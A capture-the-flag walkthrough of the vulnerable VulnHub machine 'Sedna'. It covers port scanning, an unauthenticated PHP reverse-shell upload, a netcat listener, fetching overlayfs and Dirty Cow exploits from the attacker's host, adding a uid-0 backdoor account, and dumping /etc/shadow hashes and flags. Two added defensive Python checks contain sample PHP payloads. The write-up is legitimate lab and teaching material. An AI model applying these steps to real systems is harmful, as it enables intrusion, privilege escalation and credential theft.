hackfest2016: Sedna
Location
https://download.vulnhub.com/hackfest2016/Sedna.ova
Description
This is a vulnerable machine I created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty: Medium
According to the description there are multiple ways to root this box, and it should be doable for someone with some experience.
There are 4 flags on this machine: 1 for a shell, 1 for root access and 2 for post-exploitation on Sedna.
Getting started
Starting with nmap to see what ports are open and what services run behind them.
┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -sC -p- 192.168.171.5

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 20:18 CET
Nmap scan report for 192.168.171.5
Host is up (0.0096s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp    open  domain      ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE STLS TOP RESP-CODES SASL UIDL CAPA PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          47986/tcp  status
|_  100024  1          52537/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS IDLE more have ID post-login SASL-IR listed capabilities LOGINDISABLEDA0001 STARTTLS LITERAL+ IMAP4rev1 ENABLE OK Pre-login
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS IDLE more ID have SASL-IR post-login listed OK capabilities LITERAL+ IMAP4rev1 ENABLE AUTH=PLAINA0001 Pre-login
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
47986/tcp open  status      1 (RPC #100024)
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m56s, deviation: 0s, median: 59m56s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-17T16:20:58-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.68 seconds
A lot of open ports and services running. I’ll start with port 80 and work my way through the list of open ports.
Webserver
First stop is the main page. Nothing much in the source code, so it’s time to start up dirsearch.
┌─[n13mant@planetmars]─[~]
└──╼ $python3 ./dirsearch/dirsearch.py -u 'http://192.168.171.5' -r -e php -w '/usr/share/wordlists/dirb/common.txt' -x 404,405

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 4614

Error Log: /home/n13mant/dirsearch/logs/errors-17-03-21_12-56-27.log

Target: http://192.168.171.5

[12:56:27] Starting:
[12:56:27] 200 -  101B - /
[12:56:27] 403 -  284B - /.hta
[12:56:40] 301 -  314B - /blocks  ->  http://192.168.171.5/blocks/
[12:56:56] 301 -  313B - /files  ->  http://192.168.171.5/files/
[12:57:03] 200 -  101B - /index.html
[12:57:13] 301 -  315B - /modules  ->  http://192.168.171.5/modules/
[12:57:28] 200 -   36B - /robots.txt
[12:57:31] 403 -  293B - /server-status
[12:57:38] 301 -  314B - /system  ->  http://192.168.171.5/system/
[12:57:39] 301 -  314B - /themes  ->  http://192.168.171.5/themes/
Because there is also a proxy server running on port 8080, I run the dirsearch scan again, this time via the proxy server.
┌─[n13mant@planetmars]─[~]
└──╼ $python3 ./dirsearch/dirsearch.py -u 'http://192.168.171.5:8080/' -r -e php -w '/usr/share/wordlists/dirb/common.txt' -x 404,405

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 4614

Error Log: /home/n13mant/dirsearch/logs/errors-17-03-21_12-58-28.log

Target: http://192.168.171.5:8080/

[12:58:28] Starting:
[12:58:29] 200 -    2KB - /
[12:58:53] 302 -    0B  - /docs  ->  http://192.168.171.5:8080/docs/
[12:58:57] 302 -    0B  - /examples  ->  http://192.168.171.5:8080/examples/
[12:59:05] 302 -    0B  - /host-manager  ->  http://192.168.171.5:8080/host-manager/
[12:59:07] 200 -    2KB - /index.html
[12:59:13] 302 -    0B  - /manager  ->  http://192.168.171.5:8080/manager/
[12:59:14] 302 -    0B  - /META-INF  ->  http://192.168.171.5:8080/META-INF/
This time I get an HTTP basic authentication prompt. Before following this lead further, I first run a nikto scan against port 80.
┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.171.5/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.5
+ Target Hostname:    192.168.171.5
+ Target Port:        80
+ Start Time:         2017-03-21 18:52:15 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-03-21 18:53:05 (GMT1) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
A license file that may identify the site software. Worth taking a look, but first I run nikto again, this time via the proxy server.
┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.171.5/' --useproxy 'http://192.168.171.5:8080/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.5
+ Target Hostname:    192.168.171.5
+ Target Port:        80
+ Proxy:              192.168.171.5:8080
+ Start Time:         2017-03-21 13:16:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS (May be proxy's methods, not server's)
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7838 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-03-21 13:17:49 (GMT1) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Looking at all the information gathered, I decide to check out the license file first.
After a quick search on exploit-db it seems there is an exploit for this software that leads to an arbitrary file upload, placing the uploaded file in the /files/ folder.
The exploit includes a snippet of HTML that, saved as a local page, creates a form for uploading files to the target.
For the upload I use the PHP reverse shell from pentestmonkey. Once the upload has finished, I request the uploaded file and get a reverse shell.
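The upload worked because the CMS accepted a .php file from an unauthenticated form and dropped it into a folder the web server executes scripts from. As an added example (editor's code, not part of the original writeup and not the CMS's own handler), here is the minimum an upload handler for a folder like /files/ should do: allowlist the extension, check the file's leading bytes against that extension, refuse bodies containing a PHP open tag, and store the file under a server-chosen name. The sample file names and contents are constructed for the demonstration.

```python
import os
import re
import secrets

# Constructed samples: one real-looking PNG and two PHP payloads disguised
# the way uploads to a web-served folder usually are.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SAMPLES = {
    "logo.png": PNG_MAGIC + b"\x00" * 16,
    "shell.php": b"<?php exec($_GET['c']); ?>",
    "photo.php.png": b"<?php system('id'); ?>",   # double extension, PHP body
}

# Allowed extensions mapped to the leading bytes a file of that type must have.
ALLOWED = {".png": PNG_MAGIC, ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}
# Any PHP open tag (long form, short form and <?=) anywhere in the body.
PHP_TAG = re.compile(rb"<\?")


def check_upload(filename, data):
    """Return (accepted, reason, stored_name) for one candidate upload.

    The client-supplied name is used only for its extension; the stored
    name is random so an attacker never knows the path of what was saved.
    """
    base = os.path.basename(filename)
    # Look at the whole suffix chain so "photo.php.png" is not seen as ".png".
    suffixes = [s.lower() for s in base.split(".")[1:]]
    if len(suffixes) != 1:
        return False, "multiple or missing extensions", None
    ext = "." + suffixes[0]
    if ext not in ALLOWED:
        return False, "extension not allowed", None
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    if PHP_TAG.search(data):
        return False, "php open tag in body", None
    stored = secrets.token_hex(16) + ext
    return True, "ok", stored


def triage(samples=SAMPLES):
    """Run check_upload over every sample; returns {name: reason}."""
    return {name: check_upload(name, data)[1] for name, data in samples.items()}


if __name__ == "__main__":
    for name, reason in triage().items():
        print(f"{name:16s} -> {reason}")
```

Even with this check in place, the folder that receives uploads should not execute scripts at all: with Apache and mod_php, `php_admin_flag engine off` inside the `<Directory>` block for /files/ makes the server hand a PHP file back as plain data instead of running it, which is the control that would have turned the upload above into a harmless download.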
┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $nc -lvnp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from 192.168.171.5 60358 received!
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 15:17:37 up 37 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Now to look around the system.
www-data@Sedna:/home$ cat /etc/passwd
cat /etc/passwd
[.....SNIP....]
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
www-data@Sedna:/home$ cd /var/www
cd /var/www
www-data@Sedna:/var/www$ ls -lah
ls -lah
total 16K
drwxr-xr-x  3 root     root     4.0K Oct 22 13:33 .
drwxr-xr-x 13 root     root     4.0K Oct  7 15:17 ..
-rw-r--r--  1 www-data www-data   33 Oct 22 13:33 flag.txt
drwxr-xr-x  9 www-data www-data 4.0K Oct 25 09:27 html
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
First flag.
www-data@Sedna:/$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
www-data@Sedna:/$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
Ubuntu 14.04 with kernel 3.13.0. Maybe an overlayfs exploit will work to get root.
I download the code from exploit-db into a file on my local system, serve it with SimpleHTTPServer and wget it onto the remote system, where I compile and run it.
www-data@Sedna:/tmp/n13mant$ wget http://192.168.171.3:8000/overlayfs.c
wget http://192.168.171.3:8000/overlayfs.c
--2017-03-24 00:34:09--  http://192.168.171.3:8000/overlayfs.c
Connecting to 192.168.171.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/plain]
Saving to: 'overlayfs.c'

100%[======================================>] 4,968       --.-K/s   in 0s

2017-03-24 00:34:09 (583 MB/s) - 'overlayfs.c' saved [4968/4968]

www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfs.c
chmod 777 overlayfs.c
www-data@Sedna:/tmp/n13mant$ gcc overlayfs.c -o overlayfs
gcc overlayfs.c -o overlayfs
www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfc
chmod 777 overlayfc
chmod: cannot access 'overlayfc': No such file or directory
www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfs
chmod 777 overlayfs
www-data@Sedna:/tmp/n13mant$ ./overlayfs
./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
www-data@Sedna:/tmp/n13mant$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The start looked promising… but unfortunately no root. With the kernel version number in hand I tried several exploits. After a while I tried the ‘Dirty Cow’ exploit. It abuses a race condition in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. In other words, an unprivileged local user could gain write access to a read-only memory mapping and escalate their privileges. There is a very good explanation of ‘Dirty Cow’, which you can find here. Also, to be fair, I must warn you that if you try different ‘Dirty Cow’ exploits it’s wise to take a snapshot of your Sedna box first, because the exploit can crash it and you will need a fresh one to try again. In real life this would mean admins will probably notice something is wrong with their server when it crashes, which normally isn’t a good thing LoL.
After a few tries I found that the ‘Dirty Cow’ exploit from Firefart did the trick. After downloading the source code to the remote machine, I compiled and ran it. Unfortunately, with this exploit I need to act fast: shortly after it runs, the box freezes up and I have to reboot it.
www-data@Sedna:/tmp$ mkdir n13mant
mkdir n13mant
www-data@Sedna:/tmp$ cd n13mant
www-data@Sedna:/tmp/n13mant$ wget http://192.168.171.3:8000/40839.c
wget http://192.168.171.3:8000/40839.c
--2017-03-25 11:25:25--  http://192.168.171.3:8000/40839.c
Connecting to 192.168.171.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5124 (5.0K) [text/plain]
Saving to: '40839.c'

100%[======================================>] 5,124       --.-K/s   in 0s

2017-03-25 11:25:25 (743 MB/s) - '40839.c' saved [5124/5124]

www-data@Sedna:/tmp/n13mant$ gcc -pthread 40839.c -o dcow -lcrypt
gcc -pthread 40839.c -o dcow -lcrypt
www-data@Sedna:/tmp/n13mant$ ./dcow thisismypassword
./dcow thisismypassword
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: thisismypassword
Complete line:
firefart:fiYb0/QFCUAsk:0:0:pwned:/root:/bin/bash

mmap: b7752000
Now to move fast.
┌─[n13mant@planetmars]─[~]
└──╼ $ssh -l firefart 192.168.171.5
firefart@192.168.171.5's password:
Added user firefart.
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Mar 25 11:49:03 EDT 2017

  System load:     0.41
  Memory usage:    4%
  Processes:       51
  Usage of /:      29.7% of 7.26GB
  Swap usage:      0%
  Users logged in: 0

  => There is 1 zombie process.

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# cat /etc/shadow
root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::
[.....SNIP.....]
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::
statd:*:17110:0:99999:7:::
firefart@Sedna:~# ls -lah
total 65M
drwx------  5 firefart root 4.0K Mar 12 00:54 .
drwxr-xr-x 21 firefart root 4.0K Oct  7 15:17 ..
-rw-r--r--  1 firefart root  65M Oct 24 07:04 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
-rw-------  1 firefart root  212 Mar 12 00:54 .bash_history
-rw-r--r--  1 firefart root 3.1K Feb 19  2014 .bashrc
drwx------  2 firefart root 4.0K Oct 22 22:14 .cache
drwxr-xr-x  2 firefart root 4.0K Oct  7 20:04 chkrootkit
----------  1 firefart root   33 Oct 22 13:07 flag.txt
-rw-r--r--  1 firefart root  140 Feb 19  2014 .profile
-rw-r--r--  1 firefart root   66 Oct  8 03:34 .selected_editor
drwx------  2 firefart root 4.0K Oct 22 22:14 .ssh
firefart@Sedna:~# cat flag.txt
a10828bee17db751de4b936614558305
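Both privilege-escalation attempts above leave traces a host check can pick up: the overlayfs run prints “/etc/ld.so.preload created”, and the Dirty Cow run backs /etc/passwd up to /tmp/passwd.bak and appends a second uid-0 user whose DES hash sits directly in /etc/passwd instead of /etc/shadow. The following audit is an added example (editor's code, not part of the original writeup) that looks for exactly those traces. The passwd text is constructed around the ‘firefart’ line the exploit printed above; the artifact paths are the two the outputs name, and the `exists` parameter is only there so the check can be exercised without touching the real filesystem.

```python
import os

# Constructed /etc/passwd content. The 'firefart' line is the one the Dirty
# Cow run above wrote; the other entries are a plain minimum for context.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
firefart:fiYb0/QFCUAsk:0:0:pwned:/root:/bin/bash
"""

# Files the two exploits shown in the writeup leave behind.
ARTIFACT_PATHS = ["/etc/ld.so.preload", "/tmp/passwd.bak"]


def audit_passwd(text):
    """Return a list of findings for text in /etc/passwd format."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        # Only 'root' should carry uid 0; any other uid-0 entry is a backdoor account.
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: extra uid-0 account '{name}'")
        # Modern systems keep 'x' here and the hash in /etc/shadow; a real
        # hash ('fiYb0/QFCUAsk' above) means passwd was edited by hand or tool.
        if pw == "":
            findings.append(f"line {lineno}: empty password for '{name}'")
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append(f"line {lineno}: password hash stored in passwd for '{name}'")
    return findings


def audit_artifacts(paths=ARTIFACT_PATHS, exists=os.path.exists):
    """Return the subset of paths that exist on the host."""
    return [p for p in paths if exists(p)]


def audit(passwd_text, paths=ARTIFACT_PATHS, exists=os.path.exists):
    """Combine the passwd check and the artifact check into one findings list."""
    present = audit_artifacts(paths, exists)
    return audit_passwd(passwd_text) + [f"artifact present: {p}" for p in present]


if __name__ == "__main__":
    with open("/etc/passwd") as fh:
        live = fh.read()
    for finding in audit(live) or ["no findings"]:
        print(finding)
```

A present /etc/ld.so.preload is a lead rather than proof, since some legitimate tooling installs one; what matters is that the file appeared without a package change, so pair this check with a file-integrity baseline. The extra uid-0 entry, on the other hand, has no legitimate explanation and is the finding to alert on immediately.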
I got root… I got the flag… game over.
There are more flags to gain, for example by cracking the hashes of ‘crackmeforpoints’ or ‘root’ with hashcat or John the Ripper, but for lack of time I’ll leave that to someone else.
Conclusion
The challenge was a bit frustrating: not many hints or leads to get further, and when you finally get a working exploit the system becomes unstable and you need to hurry to get the job done. Too slow and you have to reboot and try again. I think the challenge would be more fun if the system stayed a bit more stable after the exploit. If someone has a better solution, please do tell.